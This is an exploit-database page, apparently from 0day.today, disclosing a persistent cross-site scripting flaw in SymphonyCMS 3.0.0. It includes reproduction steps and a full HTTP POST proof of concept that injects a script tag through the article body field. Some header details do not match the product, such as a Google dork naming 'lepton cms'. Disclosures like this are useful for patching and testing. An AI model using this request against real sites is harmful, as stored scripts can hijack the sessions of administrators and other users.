0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SymphonyCMS 3.0.0 - Persistent Cross-Site Scripting Vulnerability
# Exploit Title: SymphonyCMS 3.0.0 - Persistent Cross-Site Scripting # Google Dork: "lepton cms" # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: https://www.getsymphony.com/ # Software Link: https://www.getsymphony.com/ # Version: 3.0.0 # Tested on: Windows # CVE : N/A Description: Cross-site scripting (XSS) vulnerabilities in Symphony CMS 3.0.0 allow remote attackers to inject arbitrary web script or HTML To Reproduce: Steps to reproduce the behavior: 1. Login as member 2. Go to 'Articles' 3. Submit malicious content 4. Anyone (inclued admin) view article and XSS excuted Expected behavior When admin or user view content, a pop-up will be displayed Affected componets: events\event.publish_article.php in Symphony CMS 3.0.0 allows XSS via fields['body'] to appendSubheading POC: POST /symphonycms/symphony/publish/articles/new/ HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://target/symphonycms/symphony/publish/articles/new/ Content-Type: multipart/form-data; boundary=---------------------------17679481844164416353626544932 Content-Length: 1111 Origin: http://target Connection: close Cookie: PHPSESSID=b21qllug0g7ft80ueo3bn0bgcd; Upgrade-Insecure-Requests: 1 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="xsrf" vr-i2mWs18DPjVmZ8z2nB-Gb3hdyrb -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="MAX_FILE_SIZE" 5242880 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[title]" TEST XSS -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[body]" <script>alert('XSS')</script> -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[date]" 08/28/2020 5:55 am -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[categories][]" 2 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[publish]" yes -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="action[save]" Create Entry -----------------------------17679481844164416353626544932-- Desktop (please complete the following information): OS: Windows 10 Browser: Firefox or Chrome Application: XAMPP, Burpsuite Additional context Tested on: 9.03.50 verison POC at: https://vimeo.com/405740251 # 0day.today [2024-06-28] #